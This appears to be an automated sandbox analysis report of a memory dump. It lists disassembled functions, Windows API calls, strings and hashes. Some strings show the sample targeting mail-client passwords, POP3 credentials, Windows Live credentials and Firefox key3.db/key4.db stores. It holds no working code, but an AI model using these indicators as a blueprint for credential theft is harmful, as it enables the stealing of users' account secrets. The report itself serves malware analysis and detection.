
Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: PrivateProfileStringstrchr
String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
API String ID: 1348940319-1729847305
Opcode ID: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
Instruction ID: ebc3817507c74d0428b70d6b21ed795ce2a60aa758e9561c8f94ff6eeee5590f
Opcode Fuzzy Hash: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
Instruction Fuzzy Hash: 4A318F7090420ABEEF219F60CC45BD9BFACEF14319F10816AF9587A1D2D7B89B948B54

Uniqueness

Uniqueness Score: -1.00%

Function 0041096F, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041099F
memcpy.MSVCRT ref: 004109C5
memcpy.MSVCRT ref: 004109DD

Strings

", xrefs: 00410999
°, xrefs: 004109B2
&, xrefs: 004109BF
<, xrefs: 00410980
>, xrefs: 0041098C
<br>, xrefs: 004109D7

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
Instruction ID: 3875996c88d7773ad821c0e973cab4ee718d2e20412430da402bf8ed1fec6725
Opcode Fuzzy Hash: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
Instruction Fuzzy Hash: DF01D4F7EE469869FB3100094C23FEB4A8947A7720F360027F98525283A0CD0CD3429F

Uniqueness

Uniqueness Score: -1.00%

Function 00405E41, Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00405E58
GetWindow.USER32(?,00000005), ref: 00405E70
GetWindow.USER32(00000000), ref: 00405E73

Part of subcall function 004015AF: GetWindowRect.USER32(?,?), ref: 004015BE
Part of subcall function 004015AF: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D9

GetWindow.USER32(00000000,00000002), ref: 00405E7F
GetDlgItem.USER32(?,000003ED), ref: 00405E96
GetDlgItem.USER32(?,00000000), ref: 00405EA8
GetDlgItem.USER32(?,00000000), ref: 00405EBA
GetDlgItem.USER32(?,000003ED), ref: 00405EC8
SetFocus.USER32(00000000), ref: 00405ECB

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$Item$Rect$ClientFocusPoints
String ID:
API String ID: 2432066023-0
Opcode ID: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
Instruction ID: 4031fba040b0e189dacc9fafa17b87c2e22a92f85e78ae2064a779fcc19fa509
Opcode Fuzzy Hash: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
Instruction Fuzzy Hash: AE01E571500708AFDB112B62DC89E6BBFACEF81324F11442BF5449B252DBB8E8008E28

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2E4, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66

memset.MSVCRT ref: 0040F396
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
_strnicmp.MSVCRT ref: 0040F3C7
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413

Strings

windowslive:name=, xrefs: 0040F3C1
WindowsLive:name=*, xrefs: 0040F30B, 0040F342

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide$Version_strnicmpmemset
String ID: WindowsLive:name=*$windowslive:name=
API String ID: 945165440-3589380929
Opcode ID: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
Instruction ID: 060cf85e61608373f285e6b38907096c177b9006a2a87b36be12541c3eea0e32
Opcode Fuzzy Hash: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
Instruction Fuzzy Hash: 034157B1408345AFD720DF24D88496BBBE8FB95314F004A3EF995A3691D734ED48CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004036D7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238

strchr.MSVCRT ref: 00403711
_mbscpy.MSVCRT ref: 0040373A
_mbscpy.MSVCRT ref: 0040374A
strlen.MSVCRT ref: 0040376A
sprintf.MSVCRT ref: 0040378E
_mbscpy.MSVCRT ref: 004037A4

Strings

%s@gmail.com, xrefs: 00403788

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
String ID: %s@gmail.com
API String ID: 500647785-4097000612
Opcode ID: 1857ba01284e3ef5fad87af133785b5aa375f57696c97bdc8e280aa674fe1889
Instruction ID: 72ede288a24c3b6660e37d3abac1967f853eec84a0165e1bcd054a17ec7f23cd
Opcode Fuzzy Hash: 1857ba01284e3ef5fad87af133785b5aa375f57696c97bdc8e280aa674fe1889
Instruction Fuzzy Hash: 6F21ABF290411C6AEB11DB54DCC5FDAB7BCAB54308F0445AFF609E2181DA789B888B65

Uniqueness

Uniqueness Score: -1.00%

Function 00409213, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409239
GetDlgCtrlID.USER32(?), ref: 00409244
GetWindowTextA.USER32(?,?,00001000), ref: 00409257
memset.MSVCRT ref: 0040927D
GetClassNameA.USER32(?,?,000000FF), ref: 00409290
_strcmpi.MSVCRT ref: 004092A2

Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C

Strings

sysdatetimepick32, xrefs: 0040929C

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
String ID: sysdatetimepick32
API String ID: 3411445237-4169760276
Opcode ID: 2263deae77ad64fe6a337343bfeab9347d6a54f7c053bec4a710b54e1cc46990
Instruction ID: a0e2247af9db09d92512eaab276e72a1f93a19cb85935bad7b90667d70954a25
Opcode Fuzzy Hash: 2263deae77ad64fe6a337343bfeab9347d6a54f7c053bec4a710b54e1cc46990
Instruction Fuzzy Hash: 32110A728050187FEB119754DC41EEB77ACEF55301F0000FBFA04E2142EAB48E848B64

Uniqueness

Uniqueness Score: -1.00%

Function 00405972, Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00405A1A
GetDlgItem.USER32(?,000003E9), ref: 00405A2D
GetDlgItem.USER32(?,000003E9), ref: 00405A42
GetDlgItem.USER32(?,000003E9), ref: 00405A5A
EndDialog.USER32(?,00000002), ref: 00405A76
EndDialog.USER32(?,00000001), ref: 00405A89

Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762

SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Item$DialogMessageSend
String ID:
API String ID: 2485852401-0
Opcode ID: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
Instruction ID: 8242765b3035aad42ded22ad072fa167e05c4db834e8c53cb5a522b966aec9bd
Opcode Fuzzy Hash: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
Instruction Fuzzy Hash: DC619E70200A05AFDB21AF25C8C6A2BB7A5FF44724F00C23AF955A76D1E778A950CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0EB, Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
GetSysColor.USER32(0000000F), ref: 0040B1CE
DeleteObject.GDI32(?), ref: 0040B202
DeleteObject.GDI32(00000000), ref: 0040B205
SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: MessageSend$DeleteImageLoadObject$Color
String ID:
API String ID: 3642520215-0
Opcode ID: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
Instruction ID: 035281c2cfb68a6c78eb86e81ad7e7fbca9e62364f8fd823d381b3cb5a7ebbdd
Opcode Fuzzy Hash: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
Instruction Fuzzy Hash: B7318175280708BFFA316B709C47FD6B795EB48B01F104829F3856A1E2CAF278909B58

Uniqueness

Uniqueness Score: -1.00%

Function 00405BBD, Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00405BCE
??3@YAXPAX@Z.MSVCRT ref: 00405BEA
??2@YAPAXI@Z.MSVCRT ref: 00405C11
memset.MSVCRT ref: 00405C22
??2@YAPAXI@Z.MSVCRT ref: 00405C51
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405C9E
SetFocus.USER32(?,?,?,?), ref: 00405CA7
??3@YAXPAX@Z.MSVCRT ref: 00405CB5

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: 67f10acdfa4a8f43cc395e899afe5d23da730d96d34ea9f640f3fd50956f6045
Instruction ID: 8a5161a197c3c11310b51994d494e99affbcf27179d68dd4cd1e15cf4b4d4d3b
Opcode Fuzzy Hash: 67f10acdfa4a8f43cc395e899afe5d23da730d96d34ea9f640f3fd50956f6045
Instruction Fuzzy Hash: 0431B471500605AFEB249F69C845D2AF7A8FF043547148A3FF219E72A1DB78EC508B54

Uniqueness

Uniqueness Score: -1.00%

Function 0040690E, Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 85stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406930
strlen.MSVCRT ref: 0040693B
strlen.MSVCRT ref: 0040699D
strlen.MSVCRT ref: 004069AB
strlen.MSVCRT ref: 00406949

Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98

Strings

C@, xrefs: 00406938
key3.db, xrefs: 004069A3, 004069A8, 004069B9
key4.db, xrefs: 00406941, 00406946, 00406957

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$_mbscat_mbscpymemset
String ID: C@$key3.db$key4.db
API String ID: 581844971-2841947474
Opcode ID: 4cd6a97c6f09c36a5fb0adc4592fb996ab353a14a314023ffd691876fe9db25d
Instruction ID: 276f595f6d9fb14d306b90d89522efda4e53a8973e3769554d2ee0aec37c6aae
Opcode Fuzzy Hash: 4cd6a97c6f09c36a5fb0adc4592fb996ab353a14a314023ffd691876fe9db25d
Instruction Fuzzy Hash: 5D21F9729041196ADF10AA66DC41FCE77ACDF11319F1100BBF40DF6091EE38DA958668

Uniqueness

Uniqueness Score: -1.00%

Function 0040B86F, Relevance: 12.1, APIs: 8, Instructions: 76COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0040B88E
GetWindowRect.USER32(?,?), ref: 0040B8A4
GetWindowRect.USER32(?,?), ref: 0040B8B7
BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
EndDeferWindowPos.USER32(?), ref: 0040B941

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$Defer$Rect$BeginClient
String ID:
API String ID: 2126104762-0
Opcode ID: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
Instruction ID: cf9ea3ecf4623016fd9dc3f5f3f1318dd3ce101ba80f5eccba740e206150479f
Opcode Fuzzy Hash: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
Instruction Fuzzy Hash: F221C276A00609FFDF118FA8DD89FEEBBB9FB08700F104065FA55A2160C7716A519F24

Uniqueness

Uniqueness Score: -1.00%

Function 00407065, Relevance: 12.1, APIs: 8, Instructions: 72COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000011), ref: 00407076
GetSystemMetrics.USER32(00000010), ref: 0040707C
GetDC.USER32(00000000), ref: 0040708A
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
GetWindowRect.USER32(004012E4,?), ref: 004070BB
MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
String ID:
API String ID: 1999381814-0
Opcode ID: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
Instruction ID: 4d379cb21657894a0e11cf9a22620d5233689a1bec75a9944306807f4dd79964
Opcode Fuzzy Hash: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
Instruction Fuzzy Hash: 8F11B735E00619AFDF108FB8CC49BAF7F79EB45351F040135EE01E7291DA70A9048A91

Uniqueness

Uniqueness Score: -1.00%

Function 00406C3D, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 00406C45
strlen.MSVCRT ref: 00406C52
GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C0BB,?), ref: 00406C61
GlobalFix.KERNEL32(00000000), ref: 00406C6E
memcpy.MSVCRT ref: 00406C77
GlobalUnWire.KERNEL32(00000000), ref: 00406C80
SetClipboardData.USER32(00000001,00000000), ref: 00406C89
CloseClipboard.USER32 ref: 00406C99

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
String ID:
API String ID: 2315226746-0
Opcode ID: 03be3704cc721547966aa068edf686a4aa83173a8765523f495244e3b1396edf
Instruction ID: 8edcd2d2b4f986e571765b3eebb92d88a59871b3330cf63fe52768e208e874e1
Opcode Fuzzy Hash: 03be3704cc721547966aa068edf686a4aa83173a8765523f495244e3b1396edf
Instruction Fuzzy Hash: 23F0E93B5047186BD7102FA1BC4CE6BBB2CDB86F96B050039FA0AD6253DE755C0447B9

Uniqueness

Uniqueness Score: -1.00%

Function 004258DC, Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 438COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00425AA4
memcpy.MSVCRT ref: 00425D08

Strings

string or blob too big, xrefs: 00425229
statement aborts at %d: [%s] %s, xrefs: 0042525A
out of memory, xrefs: 00425E19
abort due to ROLLBACK, xrefs: 00427E1B
unknown error, xrefs: 00426E65

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpymemset
String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
API String ID: 1297977491-3883738016
Opcode ID: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
Instruction ID: fc76bc8343265493366407fdb1c4d707e5d8df4650a3499163c8513785776b89
Opcode Fuzzy Hash: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
Instruction Fuzzy Hash: 64128B71A04629DFDB14CF69E481AADBBB1FF08314F54419AE805AB341D738B982CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00411C4E, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 00411DA7
__aullrem.LIBCMT ref: 00411DBD
__aulldvrm.LIBCMT ref: 00411E12

Strings

-x0, xrefs: 00411E81
0123456789ABCDEF0123456789abcdef, xrefs: 00411DF3
-, xrefs: 00411CB9

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: __aulldvrm$__aullrem
String ID: -$-x0$0123456789ABCDEF0123456789abcdef
API String ID: 643879872-978417875
Opcode ID: 73e90253892cd7d40fca50a1c2c0480d43455e5e9d4f7039f07d8d475e9bdb23
Instruction ID: 6ef1093ec9221891fb8685c47ab9d8627f9f8a7ffe3427591e5c2e9f96174410
Opcode Fuzzy Hash: 73e90253892cd7d40fca50a1c2c0480d43455e5e9d4f7039f07d8d475e9bdb23
Instruction Fuzzy Hash: A5617C316083819FD7118F2885407ABBBE1AFC6704F18495FFAC497362D379D9898B8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7EA, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D80B
memset.MSVCRT ref: 0040D81F
memset.MSVCRT ref: 0040D833

Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603

memcpy.MSVCRT ref: 0040D900
memcpy.MSVCRT ref: 0040D943
memcpy.MSVCRT ref: 0040D960

Strings

user_pref(", xrefs: 0040D869

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpymemset$strlen$_memicmp
String ID: user_pref("
API String ID: 765841271-2487180061
Opcode ID: 777c9b1d5c10141c84c66f8e8958f505523dc243aa3c87cc0ca79b4f1c0a5fbb
Instruction ID: 5a65487526c3994ab00424e18f338503154a615df115d4cfef8f26f9df640fc7
Opcode Fuzzy Hash: 777c9b1d5c10141c84c66f8e8958f505523dc243aa3c87cc0ca79b4f1c0a5fbb
Instruction Fuzzy Hash: 7F419AB6904118AEDB10DB95DC81FDA77AC9F44314F1042FBE605F7181EA38AF498FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004057FC, Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00405813
SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
memset.MSVCRT ref: 004058AF
SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
SetFocus.USER32(?), ref: 00405965

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: MessageSend$FocusItemmemset
String ID:
API String ID: 4281309102-0
Opcode ID: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
Instruction ID: b1c021a56b4f7756f2b42baa300122e183270d3e6e7f1cb1ff0d1441efe58172
Opcode Fuzzy Hash: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
Instruction Fuzzy Hash: 98411BB5D00109AFEB209F95DC81DAEBBB9FF04354F00406AE914B72A1D7759E50CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A596, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
Part of subcall function 00406AD1: WriteFile.KERNEL32(00445BB0,00000001,00000000,Mxt,00000000,?,?,0040A51A,00000001,00445BB0,74784DE0), ref: 00406AEB

_mbscat.MSVCRT ref: 0040A65B
sprintf.MSVCRT ref: 0040A67D

Strings

<td bgcolor=#%s>%s, xrefs: 0040A5AD
<td bgcolor=#%s nowrap>%s, xrefs: 0040A5A1
<tr>, xrefs: 0040A5BB
 , xrefs: 0040A655

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: FileWrite_mbscatsprintfstrlen
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 1631269929-4153097237
Opcode ID: 93630de6ff84bb4f90c8eeb8a51633a1034e4670a362103d2fbd0e8697265160
Instruction ID: 832b2c653fc05485a7f242a7eb3c8d8175a8ee497f4c95e58b3f18e695e9ea43
Opcode Fuzzy Hash: 93630de6ff84bb4f90c8eeb8a51633a1034e4670a362103d2fbd0e8697265160
Instruction Fuzzy Hash: AE31AE31900218AFDF15DF94C8869DE7BB5FF45320F10416AFD11BB292DB76AA51CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00407E63, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407E84

Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B

Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5

Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00408018,?,000000FD,00000000,00000000,?,00000000,00408018,?,?,?,?,00000000), ref: 00407F1F
LocalFree.KERNEL32(?,?,?,?,?,00000000,7614ED80,?), ref: 00407F2F

Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,004107E3,?,?,?,?,004107E3,00000000,?,?), ref: 0041046D

Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE

Strings

POP3_credentials, xrefs: 00407E94
POP3_name, xrefs: 00407F3C
POP3_host, xrefs: 00407F57

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
String ID: POP3_credentials$POP3_host$POP3_name
API String ID: 524865279-2190619648
Opcode ID: 38748eb406b67c1af5be44fe8e7f31023f88db47e79a7898202b2d697a30ce1a
Instruction ID: 2c282e6ff88bd57be97cdb9cd65414afbc0c2375aa853475002addcb7488d922
Opcode Fuzzy Hash: 38748eb406b67c1af5be44fe8e7f31023f88db47e79a7898202b2d697a30ce1a
Instruction Fuzzy Hash: 75316075A4025DAFDB11EB69CC81AEEBBBCEF45314F0080B6FA04A3141D6789F498F65

Uniqueness

Uniqueness Score: -1.00%

Function 00409123, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 00409138
memset.MSVCRT ref: 00409159
GetMenuItemInfoA.USER32 ref: 00409194
strchr.MSVCRT ref: 004091AB

Strings

6, xrefs: 0040917C
0, xrefs: 00409174

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetstrchr
String ID: 0$6
API String ID: 2300387033-3849865405
Opcode ID: 028127019bd8d5dcd78e2607863079dea8646fd007d697055d123a2cbef6a2b8
Instruction ID: 102fedc8b068d714547c44678b24ea6bae60c59159463c21af6927f9d555436f
Opcode Fuzzy Hash: 028127019bd8d5dcd78e2607863079dea8646fd007d697055d123a2cbef6a2b8
Instruction Fuzzy Hash: B8210F71108380AFE7108F61D889A5FB7E8FB85344F04093FF684A6282E779DD048B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00407446, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407466
sprintf.MSVCRT ref: 00407493
strlen.MSVCRT ref: 0040749F
memcpy.MSVCRT ref: 004074B4
strlen.MSVCRT ref: 004074C2
memcpy.MSVCRT ref: 004074D2

Strings

%s (%s), xrefs: 0040748D

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

